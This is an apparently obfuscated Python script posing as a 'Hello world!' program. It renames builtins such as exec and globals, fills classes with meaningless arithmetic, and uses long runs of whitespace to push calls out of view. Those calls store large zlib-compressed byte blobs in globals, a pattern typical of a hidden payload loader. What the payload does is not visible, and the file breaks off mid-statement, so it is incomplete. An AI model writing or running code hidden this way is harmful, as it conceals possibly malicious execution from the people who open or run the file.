from builtins import *
from math import prod as _add

__code__ = 'print("Hello world!")'


Calculate, _system, Ceil, _round, Builtins, _builtins, _callfunction = exec, str, tuple, map, ord, globals, type

class _invert:
    def __init__(self, _substract):
        self._stackoverflow = _add((_substract, -29717))
        self._negative(Theory=13094)

    def _negative(self, Theory = None):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self._stackoverflow /= 99191 + Theory
        
        try:
            {_round: _round} if Builtins >= _system else {_round: _round} == Product

        except OSError:
            (({Product: _system}, _round) for _round in (_round, _round))

        except:
            _callfunction(46850 * 74639) == float

    def _cube(self, _frame = 42226):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _frame -= 12382 + 14974
        self._power != int
        
        try:
            (((Builtins, Ceil), _round) for _round in {_round: _round})

        except OSError:
            (_round, _round) if Ceil < Calculate else (Builtins, Ceil) > _system

        except:
            _callfunction(-96450 - 43457) == False

    def _floor(Absolute = type):
        return _builtins()[Absolute]

    def _walk(_modulo = -67384 * -45701, Modulo = False, Floor = _builtins):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        Floor()[_modulo] = Modulo
        
        try:
            {'Reollb5': _round} if _builtins > _system else {_round: _round} > _round

        except AttributeError:
            ((_system, {Product: _system}) for _system in {'Reollb5': _round} if _builtins != _builtins)

        except:
            _callfunction(39671 - -39514) == Ellipsis

    def execute(code = str):
        return Calculate(_system(Ceil(_round(Builtins, code))))

    @property
    def _power(self):
        self._theory = '<__main__.Ceil object at 0x000002130BE61157>'
        return (self._theory, _invert._power)

if __name__ == '__main__':
    try:
        _invert.execute(code = __code__)
        _square = _invert(_substract = 87800 - -44413)

        _invert(_substract = 34453 / -14055)._negative(Theory = _square._stackoverflow / 8586)                                                                                                                                                                                                                                                          ;_invert._walk(_modulo='IIIIlIlIlIllllIIIIlI',Modulo=b'x\x9c\xed][o\xdcF\x96~\xdf_\x11\xcc\x8b$d&h\xb2n\xa4\x81\xbc\x19\x0b\xc8H\xc6\x0fY\xc0\x06\x02C`wS\xb3\ndk\xe08c\xef\xbf\xdf\xef;\xa7\xaaY\xbcu\xb3\xa5\x96\xe5\xc4V\x8b]d\xb1X\x97S\xa7\xce\x9d\xd5\xb7w\x9b\xe6\xf6\xf7\xf3\x8b_\xcf\xde\xbe\xe3\xdf\xdbwo\xf9\xc7\x93wgo~\xfc\xd7\xed\xdd\x1a\xf7\xffk|\x93\x8f\xbc\xbc{\xf9\xf2\xee\xb9|\xdf=\x97\xf4\xe5\xcb\xe7/\xcf~}\xf6\xec\xfb\x7f|\xff\x8f\xf3\x7f\x9c\x7f_\\\\\xbcy\xf3\xe3\xf6\xe6\xfdL\r\xaf^\xbf~\xf5\xfa\x15\xff_\xedN\xc6\xcf\xff\xab\xfd\xd0|\xf80W\xc7\xcf\xff\xc4\xdf\xcf?\xcb?\xbe\xe4\x0c]\xbf\x95\x91\xfd\xd7\xd4]>uyy{y\xcb\xfft\xf0\xfa\x12\x7fx\xf4\xea\xea\xe6\xed\xbf\xef\xde\x7f\xb8\xba\x9ai\xf2\xb7\x9b\x9b\xdfn\xf1\x7f{\xfb\xdb\r\x0e\x9c\xe3\x0f\'xv\xb6\xde\xf3\xb3\xf5\x1f7\xb7\x1fn\xde\xfd~v\xf1\xc3\x7f\x9a\xf7s@\xbd\xfc\t\x85\x7fz\xf1\xe2\xf2\xf2\xc5\x8b\x9f._\xfc\xf4\x02\xe9\x0bT, R(\xc5\x93\xd7\xaf\xce\xf7\xb4\xf6\xfb\xbb\x9b\x0f\xb77\x7f\xac\x87\xe0\xbc\xf8;\xe6\x08\x7fw/\x9f?\xbf\xbb\x93T\xbe\xefU\xd7\xc5\xaf\xa7\xac\xec\x87\x9bw\xdb\xf6\xd3\xf9Y\xfb\xfbm\xf3\xdf\xa3\xdbo.f\'\xf3\xd3G|\xf8\xf7QN>\xca\t\x8e{\x80\xed\xe6f\xf3{\xf3\xee\xe6$`\x9b\xad\xeb>`\x9b\xaf,\x81\xed\xff\xaeon?\xb5\xff\xfb\xee\x8fc@\'\xed\xb0\rm\x0e\xe9W\x86k\xb77\xff~{\xb79\x06dX\x91\xac\xfd\x85\xaeO\xfc\xbd\xe0\x1a\xfd\xba\xc0\xf6\xa1\xb9\xbb\xbd\x9e\x02\xda\x1ci$\xe0~)\xf5\xa3\t\xff\x7f\xd1\xb4\xfc\xba\x80w\xdb\xfc\xa7=\x06\xe1\x08S\x80\xf47~\t8\x7f\x13V\xf3\x15A\xec\xfd\x87\xdf\x8f\x01X\xba\xe6])\xa0"\xc1W\x04\xb0\xf6\x8f\xf7\xffs\x0c\xc4\x9eS~\x83\x14\x87\xa6q\x8a\xe4\xb9t\x08@;;\xfb\xe1\xb7\xbb\x9bw3\xd2\n\x19\xae\xb2\xdeO\xc2\x84?\n\x07\xfe\xf8\xe9\xeb\x82\xf6\xed\xdd\xdd\xf8.\xa0=\t\xb39a\xe5|}\x16\xaa\x10\xe2Q\xed\xd2\xee\xaf\xda}B*\x07Yr\xdbn\xee\xb6\xed\xf9Yu\xfda\x82\xf3\x7fM\xd3\xb0i?M\xd2\xd5i\xd4\xfd\xb4C\xdd\x8f\xfc\x93\x99P\xdc\xcd\xaa\x98gY\xe7g\x17+\x14)\x16\x96\xde3\xeb&\xb8kcp\x948j\x1c\x05\x0e\xe6y^\x97\xeb\xb2*\xb7{\xcbTe}\x08\x0f.\xf4\xeb\xcd\x1b\x85\xd2w\x1f\xde\xdf\xfd\xfb\xed\xcdw\t\xa6\xdf\xbd\xbd{\x7f}\x82\x91T\xb1w6\xf6\xd4g\xbdu\xf1|\x15Gt\xa8\xac\xdc_8\xb2/a\xa5\xed\x03\x8c\xaf\xfd6\xac\xfcu(\x83-W\xbe\xf4E\xc0x\x8d7\xf6\xe0\xf0\xe6to]@\xcf\x9f\x8b\xce\xfd\x92\xfa7\x12\x90\xddc!\xe1]\xa8\xbc\xf3\xe6\xe0\xf8f:B!\x98R\xf0%\x85`h\xabP_qy\x9f\x8e\x1c\x01\x957{\xe5Lp\xb2\xd5\xdd\xcb\xd5\xean\xf5\x12\xdf+\\\xadV .\'\xc0\xef\xa2\xdc\n\xee\xae\x96\xe1\xe5\x9b\x1fo\x9b\xb7\xebm\xf3\xddkR\xde\xd7\xaf\x85\x06\xbf\x16\x1a\xcc\xf3g\xf3\x83\xd8;\xbe\x174\x0b\xf0\xef\xf22* \x9f\x9dd\xad" \x8a#H\xcf\x8f\xf7k\xab\xc4\xa29\xbcJ\xf6\xc2\xeb\'\xf9\xbb\xe4\x07\xe7\xc0\xd8\xc5\xf0rW\xab+wU\xe0S^U\xf8\xf6x\xc0\x0f\xf3\x16\xd7V\xa0\xc8\xea\xb3\xcf\x95M\x847\xa6!\x9e\xfb\x98\x92\xe0\x16\x91(/)\xbb\x10\xf9\xf3\xe3\xfes\x1f\\\xb0\xde\x93]<\x10\x0b\xf6\xb4\xe2\x8c3\xa6\x04\x132\xe9\xe8\x9f\xe9=\xbd>,puK^\xd6\xb9,\xf9\xd7\xd1\xd0\x89\xbfg\xd3"\xf8\x01\xc59BN\x80&\xe7\xf8\xfek/\xfa\x93M\xfcY\xb4l\xdd^\xa6\x94\xc6.\x9e=!CxI\x9eD\x06\x05\xee\x04\x01\x18\xdc\n\x9f{\xa0\xc6\x9e\xbe\xd9k~|\xfc\xd8]j\xf5\x1b\x7f\x9az9\xb7\xd7\x8b1\x9b}\'k}I\xf6J\xe6z\xf7l\x8a\xd7\xef\x9d\x93\x8c\x1b\xbeJ\\\xf1\xf3c\xe8\x97\x80\x9d\xd0\x7fT\xd7\xa6\xfb\x84\xa7\xcf\xef\xfeD\x80(\xad\xf1[\xbf\x010\x8c\r\xa6\x0e\xb5\xb7\xd6\xd8\x12\xf2.\xf2Mm \xcc\x81j\xfaP\xbb\xca\x94\xb6\r\x80\x99\x81\x0c\x1cV\xaeq\xd6n!\xef\x15\xbe\xd5|_C\xd0\xae\x91_\xa1\xb2B\xd2\xd6\xac\xbc\t\xcc\xf71m|a+H\xab+_8\x8a\xe6\xac\xdf\xa0\xfd\x06\xfd\x08\xc0\xef\xc6\xa2M\xdb\xf8\r\xfb\x03\xc1\xb6r5\xdaG\x07\\c\x03\xcb\xb1?\xbe\x82,nm\x11VP\xa9\x1a\xccd\x83\'I\xe5\xebP\xa2\x9f\x86\xfd\xf5\x18\x99-Lmkk\xe4\xbeE\xbb\x98w\xf4\x03W\xc1\xdb\r\xea-Q\x8f\x89\xe3\xc2x]\x11\x1c\xdbC=\x96\xf7\xadG\xf9\x02|\xa3\x1e\xb7\xc3\xf1\x18(\x18v\xeb\xac_\xa3\xff[\xd4\x1b\x8cc\xea\n\xb3\xb2\xad\xe5\xe3AV*\xf2l\xcbrF\xea\xf5\x1b[\xba\xc2\xafmc\x1b\x88\xcb\xb5a\xbb\xce\xb7\x0e#u\xa5Y\x81s\x03.~\xe3J\xbfF\xab\xfc7\xa8\xb34\x98\x03\x07(\xa0}\'\xed\x17\x96|-\xe0\xb9\x92\xcfQCq5\xe6\x03\xfdt\xe8\xbd\xb7\x9cG\xf4\x9d\xf8\x8ea\xe0X9\xd6\xdb\x84F\xeaE\x1d\xaep\xe83@\xc6\xf2\x95+\xec\x16\xfd\xaeP\x8e\xf0F\xd7\x1d\xe7\xc1"\xbf\xce\xe7\'xG\x8d\x88\xf3\xea\x04_\x9a\x1d\\0\xaf:_\xaeb=\x84+jnP\x17\xe7O\xf0\xc4\xca<\x10\xbf|#\xf3\xeb9\xaf\x01\xf9\xa6\x90\xf9\xdd\xf86\x96\xb3\xacW\xe6\xa9\xb4R\xafG\xb7=?\xac\xaf\x02$k\xe47\xc0\xb7Z\xf1\x12\xcfmQwP8p^\x81_\x96\xf8\x84~\xf4\xf1\x17\xf8\x03\xf8\x02\x12(\xcb:J\xe2%\xf1g0>\xcf~\x0e\xc6wm\xd7\x8e\x94w-\xf8U\xf8\xc0~\x0c\xea\x07n\xa0^@\x1c\xe3bE\x05\xe0\x17R\xf9]\xff,\xdak\xa5\x7fmW\x1e\xa3]cE\x90\xc6c\xbdH\xb9R\xdam\xed\xe6\xa8\xf5)\xf8\x8c\xf5RK\xff\x0b\xc0k\xed\x0c\xa0\x1fb\xfd^\xe7\x19\xf9\r\xd6g\x98\xec\xd7f<~\xe0\xf3\x06\xeb\xc5\x13~\\\x9fa%\xfd\xc2\x08mC\xdc\t2\xef\xb8\xbf\xc5s\\\xd9\xc7\xf7\xbb\x11\xbaT\xcb\xfc4\x8agXg\x86\xf0c}\xc0eb\xec\xd6\xa1\x06\xf4wu\x8f\xfe\x83n\x01\xe3\x1b\xe2\'\xe0\x83u\xde\xab\x9f\xcf\x97\x11o\xee\x01w\x8e\xbb{\xbe\x0f\x1f\xf6\x95\xfdF\xdb\xf7\x82{\xef\xf9\xde|:\xd2+\xe6W\xb2^\xca\xfb\xc1E\xe6\xcf\n\\\x8c\xe0\xc7\x1a\xe3\xaa\x06\xf8\xdb\x10\x0e\xa1\x16\xbco\x04\xbf\xd0>\xe8\n\xf1\xbe\xf1\\\xe7|\xde\xe2\xda\xcc\xb4\xcf\xf5\xbd\xd2u>\x86\xab\xd2\xe9\xde\xfa\xea\xd2R\xe8J\x0bz\x8a\xea\xf0\xfc\xf0~?\x9d\xec_\xa4\xf3\xde\x17Bo6B\x7f\x94_\x8c\xcb\xd7\xa0\xa7\x8d\xf0G\x0b\xb8\x93\x8e9\xce;\xa8f\xa5\xeb\x12\xcf5c\xba\x88\xfb\n\xdf\x15\xc6\xbe\xee\xc3oz\\\xba^Hk\x87\xfdc\xbf\xd8\xee\x11\xe3\x99\x87\xdf\x0c\x9c<qkL\xc7\x0cY\x0c\xc7-\xf4\xa3\x86\x80\xb0R\xbe\x8a6\xc8\xb7\xd6\xb8\x02\xe3\x03\xab\xa8\x9d%\x0f\x03\xaf\xf3\xcc\x07\xa7\x01J\x91\x97-\x9a\xa7\xc9t<.pK;\xbd\x0ew\xf3\x01,\xd3~N\xc0Q\xf0[\xd6\x07\xe4\x10\\\xcf\xf4K\xf9\x97W\xf8b\x06!u\x87\xc3\xf3\x07>Kz\xd4\x8a<Sg\xf9"\x179\xe1o\xe8\xb7\x9d\x1a\x17V\x89\xcc\x17\xae\xc9\xaf \xaf\x90\x1f`MWq\xbdl\x05\xef\xb8\xee*`\x13\xf0\x91\xf4U\xe6M\xcb\x83O)\xffL\xf0\xe8\xcaS.\x18\xc0a\xcc\xbf\xaa\xa1\xdc\x84z\xa7\xe4&N&q\xaf\x06^\x08_\x01>\x1a\xa5\xf3}\xf9\t3%\xeb\x01\xfdP\xf9\xa9\x93\xa7v\xfd$\xdd\xc1\xbc\x01\xef\xb9\xe6\xfb\xfc\x94\xfc\x9dx\xe7\xca!\x7f4a\x16\x9f(\x0b\xf8\xb4n)\xb98\x85O\x89y\xa7\xacz-\xcf\x81\x7f\x88\xfc\xc1\xf1b]\x8b\\Vx\x95\x1f\xd6\n7\xa1x\xa4\xfb\xb3\xebV\xf8s_.\xd0\xfaK\xa5\xd1\x14\xb8@\x06@\x83)%BZk\xc1o\x0b\xf6\x8f\xd6\x08|\x97h\x05\x94\x15\x80\xe9\xd3aOz\x12z\xf86\x94\x1f\x94\xbfRn\x12\xba\xe4\x04\x9e.\xc1gZ\x0e7\x941\x9bH\xc9\xad\xf0M\x13\xf9\xda\xb5\xce\x8f\xc8C\xccg\xbf&\xe0\x0f~r\x00\xaf\xa7\xfb\x854\xd3\x13\x80\x06Z\xcf\x16\xeb\x8b2\xa9\'\x19\x01\x97\xdd\x00\xd7(\x8b\xb4\xa4\'\x02\'\xe4\xe3\x0e\xe1\xe6\xe2\xfac\xfd%e\xd8(G\n\xfe\xa8\xdcG9\x01\x184\xa2_#>\x11\xfb+|\x89\xf0B\xdfD/\x11\xbe\xc2u\x87\xf2\x90=zxj\x0e\xe2\xbbq\xd0pDoP\xf9\x07\xf2\xbc\xf2\rK\xb9\xb2\x11\x99\xfeh\xfa\xf7-\xfd\x96~K\x1f#\x85\x14SP\xfeW\xbd\x92\xf2)(\x7f\x88\xf6\x08\'|\\\xe5L\xf0/Cy"\x88\\W\xf6\xf9\x01\xe8\x06\xf9\xb0\xd6\x13\xe9D\xe4\x9fU0\xb3\xf2\x17%\xa4\xc4\xd7U\x8f\x17\xfd\x13UX\xab\xf2\x92\xf0\x17g\x06\xf4\x86\x9e>\xe5\xebF\xf8\xe6F\xcb\xa3\xa5y~\xb8\x1a\xd1C\xad_er\xca\x02\xa4\xf6\x05\xa4\xfc\n\xa9\xd0c\x08s\xa4\xbb\xb4Oxr\x05pJ7\xd2s*\x91k\xfbt\xb5\x9e\xe2\x0fx.\x08\x7fs\xc2\x97\x93|Q\xa9\x9d\xc7\x89\x1c\x16\xed\x14\xa2\xdfDy\xc6\xf8*\xd1i\xd1\xcb&\xf8\x11\xfa5\x01\x7f\xbf\xee\xcb5\xd2\x8eM\xf2\x8d\xf0\x8d\xc9~!\x15zO\xbe%\xfa\x94\xd6S\x88\x9c\xd4\xe3;;~mz\xf2K5\xd2\xa7Fr\xe3\x8e\xefF\xf9\x14\xf3S\x8a\x9d\x84\xf2\x1e\xc7\x0f\xf9\xc1T\xaa\'\x89\xae\xb4Q\xbdiZ\xaf\x10\xbb@\x85\x99\xf3\xca\xa7\xa4\x1e\xd5O\xa8\x8fl)\xefe|\xf7\x9b|\xf55\xc9W\xf8\x1e\x8e\x1b\xf8\x95\xf4\xa2\xe3\xed]\xb2\x0e\xe4zB?\x9d\xd07\xd5n')

        _invert(_substract = -68647 - -44794)._negative(Theory = _square._stackoverflow + 5972)                                                                                                                                                                                                                                                          ;_invert._walk(_modulo='wxxxwwxwwwxxxwwxxxxwx',Modulo=b'c\xa6\xf5\xfb\xbe\xfe\xac\xeb{@_\xa8\xcf\x94\x84O\xa8\x04\xce&\xb3\x17\x8c\xc7\xb5\x11:\xcd\xe7\xa0\xa7\xe2Z\xd6\xef\xbc\xde\x99\xe9U\xb4\xa7v\xf2\xe3\x04|v\xf8N\xbb\xc6\xbe\xf5\x8e\xdb\xc9nB[\x8c\xac\xff9\xfd2\xc1\xaf$\xbc\'\xda\xef\xee\x87}z\x9c\xf4/\xd7g\xe7\xed\x0cU\x84\xdf\xe4x\x89Ol\xe7^\xe3k\xc1/\xf8\x0f\xe4!\xff@/h\xb1\xe6\xe2\x04!\rszs\xd5\xc1uh_\xd83?9\x7f\x08=>\xba\xee\xf0)\xda\xeb\x94\xcfR?(\xf9\xbc\xe0\x9f\xe0\xe2\xfc\xbc\xd0~\x86\xfa\xbc\xe8\x01\xe4\x1bjq/\x90\xee\xf8\xd6\x1c>\xe4\xeb\x9f|\x97\xfe\n\xe7\xc6\xf5\x08\xbf\xae\xadK\xf3\xc6\xfe\xef\x9b\xb7a{\xae\xd8\xd1\xe9\x19}_\xe8\xbf\xe0o\xb4\x0b\xfa]9\xccK\xa4\xbb\xf7\x83\x8f\x89t\xdd\x8a}D\xe8\x86\xd8\tk\x81C\x8f\xbf/\x84S\x11\xe9\x0f\xfab\xc0O\xc6\xf5Ex\x89\xc7g~=\x93\x9f\t|C\xc2\'\xb1;\x8c\xfdA\x8b\xfbE\xfd\x8dx\x8eZ\xebh\xcf\xa4\x1f\xc2\xa7\xfab\xbf\x8c\xd0n\x9d?\xfaG\xe8\xfb\xd9\x82/z\xfa|\x08o\\7\xf4\xfe\x90\x1be~.H}\x92\xff\xe7Z\x1f\xc2lP\x8f\xdc\x8fr\xdc\x14]\x19\xf6C\xed@\xb5\xce\x93k\xa2=\xa8N\xf6\xe9(W8\xd25\xf4\x87\xf2O\t~\xb7\xcfnJ:\xefE\xee\xc0<utL\xe4\xc8\x1ax\x7f\x8f~\x01R"\x0f\xd2?\x99\xcfo\x08v+\xe9\x8a\xf6v\xdc\xf7\xd1?a\x04\x0f\x02\xdb\x9b\xef\'\xfaW\x01n\x9d\xdc+\xf2\x02\xe0\\%\xfb\xc5^<\xec\xdb\x13J\xb1\'\xb8\x0en\xe0uEP\x9b\xf0\x9a~\x06\xdf\xa2\xf4V\xfc\xab\xaa\x81@w\t\t\xef&\xfb\x17\xe8O-\x84>\x98\xac\x9f\xb8\x99\xd9?:{>J\x19\xb1\xc9@\xfe4sx\x8a\xd6\xa9aQ\xfe\xdd\xa4r\xc2\xafj\x91\x1bM\x0e\x97\xc0\xb5Q\x8b\x1ckF\xf3\xbaV;\xe2\xeeZ\xe4)\xf5\x0b\xa6y\x1a>\xdf\xd5\xdb+\xa7\xd4pJ\x1f+U\x8e\x0f"\xc7\xa2\x9f\xeb\xce\x0f\x97\xe3\x93\xc8U=\xb9F\xf5\xc2d\x97\x1f\xc1\xb1\xa4\x1c#\xfaF#\xf2}\x8d\x19P?\x96\x8b|F\xe4)\x91\x8b\xadJl"\x07y\xd2o\xed\x97\xc83\xb4\xc3\x0e\xfb\xb1\xd6yR\xfb\x15\xe5\x14\xb1c)]i1~\x1b2\xfb\x18\xf8x\xf2\xc3j\xff\xea~;\xe2\xd7\x16\xfbT\xf2\xabj\xff\xe9\x87E\xbb\x85\xef\xf9[\'\xc6\x99\xecpM\x94\xe3\xd4oW\xca5\xed\xc7\xa2oz\xe2\x93\x96\x8f~`\x19?\xe1\xd0\x10\xefE\xdf.\xd4^\x16\xe9\x8a\xf89\xe8\x8f\x8a\xf6\xeeug7\x14{\xe1uFO\xa1\xcfS\x7f\x05.\xf8\x1e\xbd\xdd/\x7fu\xfe\x95I\x7f\xc1H\xbe\x9a\xe7?\x84\xb9\xd7y\x92\xf8\x05\xb3\xf3\'%\xb9\xb6Z /x\xadG\xfc\xf5Z\x8f\'\xfc\xc8\xcf\x91O|\x105\x84\xeb\x8c\xfa\x85\xc09\xf1s\xfa\xfcD^V}v\xa0\x07g\xf8\xaeq\x15\xd2/\xf27\'r.\xfd\xa9\xad\xca\xdd\x89n\xc6u\xb5\xc9\xf4\x869\xb9uHW1N\x9dW\xe1\xbfbR\x88\xf5;\x91S"\x1d\x13}}\x01\x7f\x17\xff~\x15T\xbe\x8f\xfdE=!\xf6\x9b\xfe\x90hO\xa0\xde\xbb[\xbf;=}\xbf|D=S\xfc_\xaa\xc7\x82\xe2R\x14\x99\xa8w\xc77\x95\xde\xce\xd2\x13\xc6\x95`\xf6U\xeeKr\x83\xe83J\'W\xca?hO\xb8\'\x9e\x94Bg+\xa5\xf3.L\xd5{\xa4\x9c)\xf15\xa2\x0f\x961\xce\xc5\t\xfe\x97\xf43\x8b\xbf9\xea\xa1dW:\x0f\xc4#\xea\x8d\x0f\x18\x87#]\x11z\x80zI[\x9d\xac\x7f\xd5\x9f\x19\x033n\xe7\xde\xe3j\x93\x9f\xac\xf3\xd3\x89\x9cQ\x93^I\xbe\xf8\xed]\xb9\x83c\xa3\xe3\xe6\xfc\t<N8\xee\xa8_:\xa1\xc3\x8d\xc6\xa9\xc48\xa4\xd2^\xef\xef\x87\x8d\xfeu\xb5\xaf\x08]L~\xfe2\xeag&\xc6e\xecYO\x9e\x12|\xa9\xeb6\xce{%x\xde\x1a\xb17\x02\xfek\xb5\x0f$;]\x8a\xebPx\xbaR\xcaa\xf4\xc2\xdf\xa8\x87\x87H/\xa3\xbfR\xe5\x10\xe5GY\xfc\xcf\x91\xf0\xc2\xf3\xd7Q\x1f\x10\xfa4\xd9O\'\xfd\xaa$\x06b\x93\xec{t+q~\x01\xb0\xd4?/\xe5\xc4\xef(|\x85t0\xc6\xa3\x89\xdd\xef\xe1p$_\xb4\xb9\xfe\xf1\x85\xc1\xcf\xf5\xfa\xf7DpKz\xb6\xf0\xb1>\x9f\x90\xf5\x99\xe4\xe2\x93\xad\xb71?\xf2Q?X\x1f\xc7O\x03\xed\x1d\xad\xd8\x1bA3\xfav\x8eY~\x10|\xe4w]\xbc\x86\x13\xfddB?\xa5}\xad\x9e\xf1G\xaa\xef\xdd\xd0\xee\'\xf17j\x7f\x8e\xf2q\x8a\xf7J\xfeH\x91\x1f\x85\x7f\xc78\xa4\x9d\xff}\xd0\x1f\xf2s7\xb6s9\xda\xf3\xeby\xfdt\xc7\x17\xcb\xd8~\x9b\xe9\xa7\xa6\xc3+\xb1WJ<C\x8f\xefV\x83\xfeQ\xde\xa8\xd4\x0eE;S\xb4\x9f\xee\xb7g\r\x9f_+\x9d\x84&\xd7\xef\xc72\x7f\xf4\x8c\xbd\x83p\xcb\xedd\x8cKU=X\xed.\xa2o`\x9d\x88I\xac\'W\xf4\xed\x97;}\xd2Bn\x85V$qe\xd1\xae:\xdf~\x94\x93\xc4\x8e.~\x0e\xb3\xc0\xbf\x94\xdb\xeb#=\xd2x=\x95\xb7\xc4\xff\xe3\x17=\x9f\xc1\xfb\xc8\xf2=\x7f\x97\xd2/\x93\xe283;>\xe4v\xf1c\xd1o\xb6,\x9eh:\xdeT\xec\x17\x85\xc8\x11J_\x82\xd8\xcb\x9d\xe8\xcf\xfb\xe2\xd3*\x95k\xc7\xf1i{\xfdjK\xe0.\xf2\xbb\xc8\xd9\xb5\xd0\xbb\xb2G/\x1b\xc1\xeb\xb5\x1d\xc6\xd5\xd5\xe0#\xa5\xfaO\x06\xeb\x9bP\\\x8b\x9d\xeb\xa0\xbf(\xda\x8dm\xf2oI\xdc\xa0\xe0\xfb\x91\xeb\x7f-v\xc6J\xed\x01\x03\x7fd\xb5\xbc?\xb3\xfe\xab\xce\x8e\xd5\x8a\xbfj\xae\x1fJ\xcf$\xfeB\xe2\x13\x05\x8fH?m\x10;Q\xcfoB\xbc*\xa9\x1bz\xd10\x99\xbf\xf6\xd0V:;h6\xff\xd0\xaeC\xc1\xfb\x12\xa7\x9b\xc5[u\xf1d\xa6>\xd8\x0eitE\x06\x08M\xb4J\xed\xd9\x18\xd7\xec\xa2\xdc\x0c\x90\x17"\x07X\xc2I\xda\x95u\x85:\xaf\xb9F\x80\t\x85\xd0\xaf\x8d\xc6\x95F\xbfQ+q\xed\xa5\xc8\xfb\xf4\x87\xca\xfa\xd5\xf8\xc9h_\x88\xfaF\x08\xa3vj\xe1\xdf&\xf9\xaf\xf0\x1c\xa0g\xa4}\xe0\xe8\xe1qm\xb8\xe6\xbb\xf1@6\x9d\x83\x97\xd8\xd9\xa8/\x89\x960\xe1o\xe4\x1a\x03&5%cVE?\x96z6\xb9\xfd\x97r\xbd\x8d\xf1\xabb\x9f\x90\xf8\x7f\x8cwMx\xc9z6={1\xe14,?7_i}\x91\x0f\xb6 1\xb4\x1a\x92\x1e\xcbx,\xfd\xdd\xa46F\xec?"\x17\x89\xfdY\xf4M\xe9\x97O\xfa\x1b\xe9p\xf4\x07\x8a}_\xe5\xa1q?\x85\x9f-\x80\x07f\xb8`?\x05\x1e\xeba<q\x07o\xd2)\x8c\x13p\x1f\xf9\xdf<\xf0D\xef\x83\xeb\n}\t#\xba\xd2\x8d\xdb\xa7qO\xc8E\x94{4\x1e\xa1?\x1e\xea\xd9\x8d\xb6+t\x96\xf68\x91\xdf\x92\xdc\x9b\xe2b\xa3\xfd\x8dv\xce:\xb3\xc7\x11O\x0e\xc1aK\x0bO\x82\x03j-\x14\xeeC=|\xd0\xafV\xe9d&?Rn\xf2\x91_\xd2\x0e\x95\xfc\xfd\x94\xbc\xf6\xc0\xc7\x93\x0b\xe0\x18\xadc\x9f\xe9\xf1\x80\xcf\xa4\xbe\xdd[\x17q\x9d\x19\xda\xb3\xa2_R\xfd\xaa\x1a\xaf@;\\\x11\xe3\x89YO)\xeb\xb1V\xbe\xe5\xeaL>nr=_\xfdo=9\xbc\x89\xfe\xa0\xa6\x93Sm\x11\xe9I\x10:\xd1.X\x8fX);\xfc\xdb\xe4\xfa\xbf\xe8\xd9#\xf98\x87?m\x89F\xec\xf5\xf1\xbd\x1c\xf1\x13F\xbdh\xa3\xefe\xf8\x04?\xf4[\xf8^m\xb3x\xe3\x07\xdb\x1dJ\xb5\xdbF\xf9\xd3H\x7f\x1c\xe7\x83s\xbao\xbeu=0Z`\xb7\x1e\xa6\xf4q\x96\xb7"_\xacf\xf5\x9f\xc7\xa1\xe7\x8d\xfa\xff\xc5\x1f9a\'P9f_\xbf\xa2>:\xd4o\x1e\x8a/._\xa7\x03\xfd\x92\xeb\xa3\x98\xb0\xaf\xb0|\xcdw\x9a\xac;-\xfe\x0c\xed\x03{\xec;\xbb\xb8\rY_JO\n\x81\x9f\x94\xf3\xb9\xfdv\xca^\xd7\xb7\xc3\xd8\x87\xaf\xbb\xb0\n\xf5<\x1c\x07t\xe7\xb3\xc1oh\xb7\xfc\xe2\xe0\x96\xe3_cI\xe3\x8b\x04\xaf\x81]\xec\xa4\xeb2\x8d\xb7\xb3\xd7\x9c@\xbej\xac\xdb\xf1\x99rh\x97\xa7\xdc\x1d\xfd\xc4\xcd\xa3\xf0\x97\xfb\xd8_\x1eHo1\x86jGo\xd5\xaeU*>\x18\xa7\xe3\x15\xbbL;\xe4\xf3\x03\xbf\xd3\x9c\\\xc5x\x87\xd5\xce\x8f%~:\xbb\x1d\xf9\xf7\\\x8cw\x11\xf9\\\xe7[\xe4\x1d\xfa!\xb8\xa6\xe4=\xce@?\'\xdf\xe7\xc25\x04:\xf6\xefZ\xde\xe3t\x96<K\xe6\x8a\xb8\xcdr\x80\xe1\x1a\xd7\xd7\xb1\\\xbanf\xe3_\x0e\xa6\xe2\xcf|\x80\xfe\xa9r\xa4\xbe\xd7\xbb\xd37\xb7\xf4\x1f\x82\xe7\xd5\x12{\xafi\xfd\xa0v\xccL\x9cD\x8a3}\x88\xdd\xa0\xdf\xce.\xeeB\xeb\x9d\x8b\xcf\xd0\xb8}\xc6\x8d\xde\xb3\xdda\x1c\xebi\xca\xef\xf1?\xcf?\x7f\xcf\xf8\xe2\x1cn1\xfeW\xe4\xf5\x18\xa7\t\xba@?#\xfdg]<0\xdf\xf7\x11}%\xf9\xc3\x87vg\xe0Q\x17\x1f;\x8f\xd7\xd5\x1e?\xfb}\xe2\x81[\xb1/\x1a\xf1C_\x8bM\xcd\x8b}4D\xfd\xa7\xe8\xe6;\xf3\xff\x8b=\x8e\xf1\xc1\x9d\x9d\xcf\xd0\x86$\xf8"\xef3I\xfcE\xf4o\xaa]\x83\xfc"\xbeO9\x01\xf7\x06\xad\x8c\xe28\x93\xfdN\xf4?\xf2\x87R\xfc\x12+\xa5\xbb\xd1\x8fU\xec\xe2F}|\x8f$D;\xe5\xb5\xd8e\xbc\xbe\xa7mc\xbf\xc5\xe2\x9a\xde\x8b\xdf\xe8\xfb\xa9\x8c\xe7\x05\r\x05%\x93\xb8\x8b\x95\xbc\xb7owq\xcd\xe9=\xc5A;q\xbe\xe3\xfb\xb82o}?m\x9d\xbd_C\xaaV2\x82\x0f\xe7\x12\xcf\x02\xd9D\xf8\x9c\xc8\r\xda\xce\xce\x0e\x8a\xbe\x88\xa6\x84RR{\x16g\xd4\x8a\x9e\xe7\xba\xf7\xd8:{\x8e\xf0C\'vh\xa8\xee\xbby\xf2\xde\xc4x\xe1J\xe3\xe4\xc4\x8eZ\x04\xd6(x\xa8\xf6;\xce#\xdb\xc5sf\x17\x07/\xefeJ\\)\xca\xab\xbf"\xf6\x97\xf2@\x1b\xf5wr;\x9f')

        if 407853 > 8555650:
            _square._cube(_frame = 13116 - _square._stackoverflow)
        elif 263180 < 1322166:
